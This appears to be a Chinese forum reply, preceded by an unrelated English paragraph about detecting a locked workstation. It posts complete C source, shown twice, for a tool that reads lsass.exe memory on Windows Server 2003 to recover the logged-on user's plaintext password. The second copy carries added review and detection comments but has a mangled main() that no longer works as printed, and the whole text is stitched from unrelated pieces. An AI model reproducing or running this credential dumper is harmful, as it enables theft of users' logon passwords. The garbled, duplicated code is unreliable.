There is no function you can call to determine whether the workstation is locked. To verify whether it is worth attempting to update your user interface, you can test whether or not your window is visible. This also has the advantage of identifying when the user cannot see your user interface because it is obscured by another window, minimized, or offscreen.
lz说的应该是象Findpass那样的程序 以前我在XP系统下用Winhex读取Lsass.exe的内存时候可以通过查找获得明文的密码 2003系统我没试过,听说是可以的。 这里有段代码,lz可以参考下://******************************************************************************** // Version: V1.0 // Coder: WinEggDrop // Date Release: 12/15/2004 // Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The Method // Used Is Pretty Unwise,But This May Be The Only Way To Review The // Logon User's Password On Windows 2003. // Test PlatForm: Windows 2003 // Compiled On: VC++ 6.0 //******************************************************************************** #include <stdio.h> #include <windows.h> #include <tlhelp32.h>#define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliablechar Password[MAX_PATH] = {0}; // Store The Found Password// Function ProtoType Declaration //------------------------------------------------------------------------------------------------------ BOOL FindPassword(DWORD PID); int Search(char *Buffer,const UINT nSize); DWORD GetLsassPID(); BOOL Is2003(); //----------------------------------------------------------------------------------// End Of Fucntion ProtoType Declaration
int main() { DWORD PID = 0; printf("Windows 2003 Password Viewer V1.0 By WinEggDrop\n\n"); if (!Is2003()) // Check Out If The Box Is 2003 { printf("The Program Can't Only Run On Windows 2003 Platform\n"); return -1; } PID = GetLsassPID(); // Get The Lsass.exe PID if (PID == 0) // Fail To Get PID If Returning Zerom { return -1; } FindPassword(PID); // Find The Password From Lsass.exe Memory return 0; } // End main()//---------------------------------------------------------------------------------- // Purpose: Search The Memory & Try To Get The Password // Return Type: int // Parameters: // In: char *Buffer --> The Memory Buffer To Search // Out: const UINT nSize --> The Size Of The Memory Buffer // Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure", // Since The Password Is Near The Above Location,But It's Not Always True That // We Will Find The Magic String,Or Even We Find It,The Password May Be Located // At Some Other Place.We Only Look For Luck //---------------------------------------------------------------------------------- int Search(char *Buffer,const UINT nSize) { UINT OffSet = 0; UINT i = 0; UINT j = 0 ; UINT Count = 0; if (Buffer == NULL) { return -1; } for (i = 0 ; i < nSize ; i++) { /* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate The Magic String,We Have To Do It Manually And Slowly */ if (Buffer[i] == 'L') { OffSet = 0; if (strnicmp(&Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == 0) { OffSet += strlen("LocalSystem") + 1; if (strnicmp(&Buffer[i + OffSet],"Remote",strlen("Remote")) == 0) { OffSet += strlen("Remote") + 1; if (strnicmp(&Buffer[i + OffSet],"Procedure",strlen("Procedure")) == 0) { OffSet += strlen("Procedure") + 1; if (strnicmp(&Buffer[i + OffSet],"Call",strlen("Call")) == 0) { i += OffSet; break; } } } } } } if (i < nSize) 
{ ZeroMemory(Password,sizeof(Password)); for (; i < nSize ; i++) { if (Buffer[i] == 0x02 && Buffer[i + 1] == 0 && Buffer[i + 2] == 0 && Buffer[i + 3] == 0 && Buffer[i + 4] == 0 && Buffer[i + 5] == 0 && Buffer[i + 6] == 0) { /* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format,So We Will Do It In That Way */ j = i + 7; for (; j < nSize; j += 2) { if (Buffer[j] > 0) { Password[Count++] = Buffer[j]; } else { break; } } return i + 7; // One Flag To Indicate We Find The Password } } } return -1; // Well,We Fail To Find The Password,And This Always Happens } // End Search//---------------------------------------------------------------------------------- // Purpose: To Get The Lsass.exe PID // Return Type: DWORD // Parameters: None //---------------------------------------------------------------------------------- DWORD GetLsassPID() { HANDLE hProcessSnap; HANDLE hProcess = NULL; PROCESSENTRY32 pe32; DWORD PID = 0; hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if( hProcessSnap == INVALID_HANDLE_VALUE ) { printf("Fail To Create Snap Shot\n"); return 0; } pe32.dwSize = sizeof(PROCESSENTRY32); if( !Process32First(hProcessSnap, &pe32)) { CloseHandle(hProcessSnap); // Must clean up the snapshot object! return 0; } do { if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0) { PID = pe32.th32ProcessID; break; } }while(Process32Next( hProcessSnap, &pe32)); CloseHandle( hProcessSnap); return PID; } // End GetLsassPID()
// Purpose: To Find The Password // Return Type: BOOLEAN // Parameters: // In: DWORD PID -> The Lsass.exe's PID //---------------------------------------------------------------------------------- BOOL FindPassword(DWORD PID) { HANDLE hProcess = NULL; char Buffer[5 * 1024] = {0}; DWORD ByteGet = 0; int Found = -1; hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID); // Open Process if (hProcess == NULL) { printf("Fail To Open Process\n"); return FALSE; } if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 * 1024,&ByteGet)) // Read The Memory From Lsass.exe { printf("Fail To Read Memory\n"); CloseHandle(hProcess); return FALSE; } CloseHandle(hProcess); Found = Search(Buffer,ByteGet); // Search The Password if (Found >= 0) // We May Find The Password { if (strlen(Password) > 0) // Yes,We Find The Password Even We Don't Know If The Password Is Correct Or Not { printf("Found Password At #0x%x -> \"%s\"\n",Found + BaseAddress,Password); } } else { printf("Fail To Find The Password\n"); } return TRUE; } // End FindPassword//------------------------------------------------------------------------------------ // Purpose: Check If The Box Is Windows 2003 // Return Type: BOOLEAN // Parameters: None //------------------------------------------------------------------------------------ BOOL Is2003() { OSVERSIONINFOEX osvi; BOOL b0sVersionInfoEx; ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX)); osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX); if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi))) { osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO); } return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2); } // End Is2003() // End Of File
以前我在XP系统下用Winhex读取Lsass.exe的内存时候可以通过查找获得明文的密码
2003系统我没试过,听说是可以的。
这里有段代码,lz可以参考下://********************************************************************************
// Version: V1.0
// Coder: WinEggDrop
// Date Release: 12/15/2004
// Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The Method
// Used Is Pretty Unwise,But This May Be The Only Way To Review The
// Logon User's Password On Windows 2003.
// Test PlatForm: Windows 2003
// Compiled On: VC++ 6.0
//********************************************************************************
#include <stdio.h>
#include <windows.h>
#include <tlhelp32.h>#define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliablechar Password[MAX_PATH] = {0}; // Store The Found Password// Function ProtoType Declaration
//------------------------------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID);
int Search(char *Buffer,const UINT nSize);
DWORD GetLsassPID();
BOOL Is2003();
//----------------------------------------------------------------------------------// End Of Function ProtoType Declaration
// Program entry point.  The "int main()" signature line did not survive the
// paste (it is visible in the collapsed copy of the listing above), so this
// block begins at the opening brace.
// Flow: print a banner, gate on Is2003(), look up the lsass.exe PID with
// GetLsassPID(), then call FindPassword() on that PID.
// Returns -1 when the version gate or the PID lookup fails, 0 otherwise; the
// BOOL result of FindPassword() is discarded.
{
DWORD PID = 0;
printf("Windows 2003 Password Viewer V1.0 By WinEggDrop\n\n"); if (!Is2003()) // Gate: continue only when Is2003() reports OS version 5.2
{
printf("The Program Can't Only Run On Windows 2003 Platform\n");
return -1;
} PID = GetLsassPID(); // Get The Lsass.exe PID -- NOTE(review): the paste folded the next statement, "if (PID == 0)", into this comment (compare the collapsed copy above); as printed, the block below returns -1 unconditionally. The guard belongs on its own line before the "{".
{
return -1; // Intended: bail out when GetLsassPID() returned 0 (snapshot failure or no lsass.exe entry)
} FindPassword(PID); // Find The Password From Lsass.exe Memory; the BOOL it returns is not checked
return 0;
}
// End main()//----------------------------------------------------------------------------------
// Purpose: Search The Memory & Try To Get The Password
// Return Type: int
// Parameters:
// In: char *Buffer --> The Memory Buffer To Search
// Out: const UINT nSize --> The Size Of The Memory Buffer
// Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure",
// Since The Password Is Near The Above Location,But It's Not Always True That
// We Will Find The Magic String,Or Even We Find It,The Password May Be Located
// At Some Other Place.We Only Look For Luck
//----------------------------------------------------------------------------------
//----------------------------------------------------------------------------------
// Search: carve a candidate password out of a buffer of bytes read from lsass.exe.
// Phase 1 scans Buffer for the NUL-separated word sequence
// "LocalSystem" "Remote" "Procedure" "Call" (case-insensitive, via strnicmp).
// Phase 2, starting at that marker, looks for the byte 0x02 followed by six zero
// bytes and copies every second byte after it into the global Password until a
// byte <= 0 is met (the data is treated as 16-bit wide characters; only the low
// byte of each unit is kept).
// In:  Buffer -- bytes to scan (NULL -> -1); nSize -- number of valid bytes.
// Out: global Password (zeroed, then filled); returns the buffer offset of the
//      first copied byte, or -1 when the marker or the 0x02 pattern is absent.
//      As the file header says, the location is a heuristic, not a contract.
// NOTE(review): bounds defects as written --
//  * the strnicmp() calls and the Buffer[i + 1 .. i + 6] tests read past nSize
//    when a match starts near the end of the buffer (no "i + k < nSize" check);
//  * Password[Count++] is never compared against sizeof(Password), so a long run
//    of non-zero bytes overruns the global;
//  * "Buffer[j] > 0" on a plain char ends the copy at any byte >= 0x80 where
//    char is signed.
//----------------------------------------------------------------------------------
int Search(char *Buffer,const UINT nSize)
{
UINT OffSet = 0; // Running offset from i while the four words are matched in turn
UINT i = 0;
UINT j = 0 ;
UINT Count = 0; // Write index into the global Password
if (Buffer == NULL)
{
return -1;
} for (i = 0 ; i < nSize ; i++)
{
/* Phase 1: the words of the marker are separated by a terminating NUL rather
than a space, so a strstr()-style search cannot match the whole marker; each
word is compared on its own and the NUL between words is skipped ("+ 1").
*/
if (Buffer[i] == 'L')
{
OffSet = 0;
if (strnicmp(&Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == 0)
{
OffSet += strlen("LocalSystem") + 1; // + 1 steps over the NUL separator
if (strnicmp(&Buffer[i + OffSet],"Remote",strlen("Remote")) == 0)
{
OffSet += strlen("Remote") + 1;
if (strnicmp(&Buffer[i + OffSet],"Procedure",strlen("Procedure")) == 0)
{
OffSet += strlen("Procedure") + 1;
if (strnicmp(&Buffer[i + OffSet],"Call",strlen("Call")) == 0)
{
i += OffSet; // Leave i at the start of "Call"; phase 2 scans onward from here
break;
}
}
}
}
}
}
if (i < nSize) // Normally true only after the break above; a full scan ends with i == nSize
{
ZeroMemory(Password,sizeof(Password));
for (; i < nSize ; i++)
{
if (Buffer[i] == 0x02 && Buffer[i + 1] == 0 && Buffer[i + 2] == 0 && Buffer[i + 3] == 0 && Buffer[i + 4] == 0 && Buffer[i + 5] == 0 && Buffer[i + 6] == 0)
{
/* Phase 2: copy the wide-character string that follows the 0x02 + six-zero
pattern, one low byte per 16-bit unit (j += 2), stopping at the first
byte that is not > 0.
*/
j = i + 7;
for (; j < nSize; j += 2)
{
if (Buffer[j] > 0)
{
Password[Count++] = Buffer[j]; // NOTE(review): no bound against sizeof(Password)
}
else
{
break;
}
}
return i + 7; // Offset of the first copied byte; the caller adds BaseAddress for display
}
}
}
return -1; // Marker or 0x02 pattern not found
}
// End Search//----------------------------------------------------------------------------------
// Purpose: To Get The Lsass.exe PID
// Return Type: DWORD
// Parameters: None
//----------------------------------------------------------------------------------
//----------------------------------------------------------------------------------
// GetLsassPID: walk a Toolhelp process snapshot and return the PID of the first
// entry whose image name equals "Lsass.EXE" (case-insensitive, strcmpi).
// Returns 0 both when the snapshot cannot be created or enumerated and when no
// matching entry exists; the caller cannot tell the two apart (only the first
// case prints a message).  hProcess is declared but never used.
//----------------------------------------------------------------------------------
DWORD GetLsassPID()
{
HANDLE hProcessSnap;
HANDLE hProcess = NULL; // Unused
PROCESSENTRY32 pe32;
DWORD PID = 0; hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if( hProcessSnap == INVALID_HANDLE_VALUE )
{
printf("Fail To Create Snap Shot\n");
return 0;
} pe32.dwSize = sizeof(PROCESSENTRY32); if( !Process32First(hProcessSnap, &pe32)) // dwSize must be set before Process32First()
{
CloseHandle(hProcessSnap); // Must clean up the snapshot object!
return 0;
} do
{
if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0) // Stop at the first match
{
PID = pe32.th32ProcessID;
break;
}
}while(Process32Next( hProcessSnap, &pe32)); CloseHandle( hProcessSnap); // Released on both the found and the not-found path
return PID;
}
// End GetLsassPID()
// Return Type: BOOLEAN
// Parameters:
// In: DWORD PID -> The Lsass.exe's PID
//----------------------------------------------------------------------------------
//----------------------------------------------------------------------------------
// FindPassword: read a fixed 5 KiB window of lsass.exe memory at BaseAddress and
// hand it to Search(); print whatever Search() left in the global Password.
// In:  PID -- the lsass.exe process id from GetLsassPID().
// Returns FALSE when OpenProcess() or ReadProcessMemory() fails (a message is
// printed), TRUE otherwise -- including when nothing was found, so the return
// value does not tell the caller whether anything was recovered.
// Detection note: the observable here is the OpenProcess(PROCESS_VM_READ) on
// lsass.exe followed by ReadProcessMemory(); a cross-process handle to lsass
// with read access is the standard telemetry point for spotting credential
// dumping (e.g. Sysmon ProcessAccess, Event ID 10, and EDR lsass-access rules).
// Only the ByteGet bytes actually returned are searched.  Nothing clears the
// global Password afterwards, so the recovered value stays in this process's
// memory and is written to stdout in clear text.
//----------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID)
{
HANDLE hProcess = NULL;
char Buffer[5 * 1024] = {0}; // 5 KiB stack window; the read below uses the same literal size
DWORD ByteGet = 0;
int Found = -1; hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID); // Only read access to the target is requested
if (hProcess == NULL)
{
printf("Fail To Open Process\n");
return FALSE;
} if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 * 1024,&ByteGet)) // One read at the hard-coded address (see the BaseAddress note at the top of the file)
{
printf("Fail To Read Memory\n");
CloseHandle(hProcess);
return FALSE;
} CloseHandle(hProcess); Found = Search(Buffer,ByteGet); // Handle released before searching; Search() fills the global Password
if (Found >= 0) // Search() returned a buffer offset
{
if (strlen(Password) > 0) // Found-but-empty prints nothing at all
{
printf("Found Password At #0x%x -> \"%s\"\n",Found + BaseAddress,Password); // Offset is relative to BaseAddress; the value itself is not verified
}
}
else
{
printf("Fail To Find The Password\n");
}
return TRUE;
}
// End FindPassword//------------------------------------------------------------------------------------
// Purpose: Check If The Box Is Windows 2003
// Return Type: BOOLEAN
// Parameters: None
//------------------------------------------------------------------------------------
//------------------------------------------------------------------------------------
// Is2003: report whether GetVersionEx() says the OS is version 5.2 (the version
// Windows Server 2003 reports; Windows XP x64 reports 5.2 as well).
// NOTE(review): if the OSVERSIONINFOEX call fails, the code only shrinks
// dwOSVersionInfoSize to sizeof(OSVERSIONINFO) and never calls GetVersionEx()
// again, so osvi keeps its zeroed fields and the function returns FALSE;
// b0sVersionInfoEx is assigned but never read afterwards.
//------------------------------------------------------------------------------------
BOOL Is2003()
{
OSVERSIONINFOEX osvi;
BOOL b0sVersionInfoEx;
ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX); if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi)))
{
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO); // Fallback size is set, but GetVersionEx() is not retried with it
}
return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);
}
// End Is2003()
// End Of File